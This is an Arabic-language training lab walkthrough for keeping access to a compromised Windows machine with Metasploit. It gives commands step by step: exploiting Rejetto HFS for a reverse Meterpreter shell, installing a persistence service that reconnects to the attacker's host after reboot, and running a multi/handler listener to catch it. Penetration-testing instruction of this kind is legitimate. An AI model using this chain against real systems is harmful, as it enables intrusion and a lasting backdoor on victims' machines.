🧪 المختبر العملي 22 : الحفاظ على الوصول - خدمة الثبات (Maintaining Access – Persistence Service

🎯 الهدف الأساسي: إنشاء خدمة ثبات (Persistence Service) على نظام Windows المستهدف، تضمن استمرار الوصول للمهاجم حتى بعد إعادة تشغيل النظام، مما يحافظ على جلسة Meterpreter بصلاحيات عالية.

🔧 الأدوات المستخدمة:

• MSFconsole: واجهة Metasploit الرئيسية.

• Exploit Module: أي وحدة استغلال تمنح جلسة Meterpreter بصلاحيات Administrator أو SYSTEM (مثلاً: windows/http/rejetto_hfs_exec من.

• Meterpreter Payload: للحصول على تحكم كامل.

• Post-Exploitation Module: exploit/windows/local/persistence أو windows/local/service_persistence.

• Multi/Handler: لإعداد مستمع لاستقبال الاتصالات العكسية المستقبلية.

📜 خطوات التنفيذ:

📊 مرحلة الاستغلال (Exploitation)

1. 🚀 بدء تشغيل MSFconsole والحصول على جلسة Meterpreter بصلاحيات Administrator:

   • ابدأ msfconsole:

     msfconsole -q

   • حدد عنوان IP للهدف.

   • 🔑 استخدام وحدة استغلال Rejetto HFS للحصول على Meterpreter:

     use exploit/windows/http/rejetto_hfs_exec
     set RHOSTS [Target_IP_Address]
     set LHOST [Your_Kali_IP_Address]
     set LPORT 4444
     set PAYLOAD windows/meterpreter/reverse_tcp
     exploit

   • إذا نفذت هذه الأوامر بنجاح، ستفتح جلسة Meterpreter session 1 opened.

   • 🔧 التحقق من الصلاحيات:

     getuid

   • يجب أن تظهر صلاحياتك Administrator أو أعلى. 🔑 المعلومة الذهبية: تتطلب وحدات الثبات صلاحيات إدارية لإنشاء خدمات نظام.

2. 🔧 إرسال جلسة Meterpreter إلى الخلفية:

   • لإرسال جلسة Meterpreter إلى الخلفية:

     background

   • للتحقق:

     sessions

   • ستظهر الجلسة رقم 1 نشطة.

📊 مرحلة ما بعد الاستغلال: الثبات (Persistence)

1. 💡 استخدام وحدة exploit/windows/local/persistence لإنشاء خدمة ثبات:

   • البحث عن الوحدة:

     search persistence

   • 🔑 استخدام الوحدة:

     use exploit/windows/local/persistence
     # أو use exploit/windows/local/service_persistence (إذا كانت متاحة)

   • ⚙️ تعيين الخيارات:

     show options
     set SESSION 1 # رقم جلسة Meterpreter الحالية
     set LHOST [Your_Kali_IP_Address]
     set LPORT 4445 # منفذ جديد لجلسة الثبات
     set PAYLOAD windows/meterpreter/reverse_tcp # حمولة Meterpreter
     set TECHNIQUE 2 # لإنشاء خدمة (Service)
     # set RPORT 4444 (إذا كنت تستخدم bind_tcp)

   • 🚀 تشغيل الوحدة:

     exploit

   • إذا نفذت هذا الأمر، ستقوم الوحدة بإنشاء خدمة جديدة على النظام المستهدف، وستحاول فتح جلسة Meterpreter جديدة. في حال النجاح، ستظهر رسالة Meterpreter session 2 opened.

2. 💡 إعداد multi/handler لاستقبال الاتصالات المستقبلية:

   • لماذا؟: لضمان استقبال الاتصالات من خدمة الثبات عند إعادة تشغيل النظام المستهدف.

   • إرسال الجلسة إلى الخلفية:

     background

   • إعداد multi/handler:

     use exploit/multi/handler
     set PAYLOAD windows/meterpreter/reverse_tcp
     set LHOST [Your_Kali_IP_Address]
     set LPORT 4445 # نفس المنفذ الذي تم تعيينه لخدمة الثبات
     exploit -j # تشغيل المستمع في الخلفية

   • إذا نفذت هذا الأمر، سيعمل المستمع في الخلفية وينتظر الاتصالات.

📊 التحقق من الثبات

1. ✅ إعادة تشغيل النظام المستهدف ومراقبة الاتصال:

   • من جلسة Meterpreter (القديمة، رقم 1) أو من خلال صدفة الأوامر:

     reboot

   • إذا نفذت هذا الأمر، سيعاد تشغيل النظام المستهدف.

   • راقب نافذة msfconsole حيث يعمل multi/handler. بعد إعادة التشغيل، يجب أن تتلقى جلسة Meterpreter جديدة (مثلاً: Meterpreter session 3 opened)، مما يؤكد نجاح الثبات.

✅ نقاط التحقق:

• يجب الحصول على جلسة Meterpreter بصلاحيات Administrator أو SYSTEM.

• يجب إنشاء خدمة ثبات بنجاح وفتح جلسة Meterpreter جديدة عبرها.

• يجب أن يتم استقبال جلسة Meterpreter جديدة من النظام المستهدف بعد إعادة تشغيله بواسطة multi/handler.